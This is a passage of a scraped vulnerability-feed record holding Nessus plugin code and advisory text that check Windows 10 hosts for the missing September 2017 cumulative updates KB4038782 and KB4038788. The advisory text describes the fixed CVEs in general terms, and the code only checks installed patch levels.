\"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n\n script_name(english:\"KB4038782: Windows 10 Version 1607 and Windows Server 2016 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.(CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system.(CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system.\n input. (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711,\n CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752,\n CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038782/windows-10-update-kb4038782\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62a3aab5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038782.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038782');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038782])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707, \n CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when\n Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content. To\n exploit the bypass, an attacker must trick a user into\n either loading a page containing malicious content or\n visiting a malicious website. The attacker could also\n inject the malicious page into either a compromised\n website or an advertisement network. The update\n addresses the bypass by correcting how the Edge CSP\n validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740,\n CVE-2017-8752, CVE-2017-8753, CVE-2017-8755,\n CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8746", "CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8724", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8751", "CVE-2017-8756", "CVE-2017-8682", "CVE-2017-11764", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8739", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8752", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8728", "CVE-2017-8597", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8729", "CVE-2017-8649", "CVE-2017-8747", "CVE-2017-8740", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8660", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8716", "CVE-2017-8648", "CVE-2017-8712", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8755", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038788.NASL", "href": "https://www.tenable.com/plugins/nessus/103130", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103130);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8597\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8648\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8716\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8724\",\n \"CVE-2017-8728\",\n \"CVE-2017-8729\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8739\",\n \"CVE-2017-8740\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8751\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n\n script_name(english:\"KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker 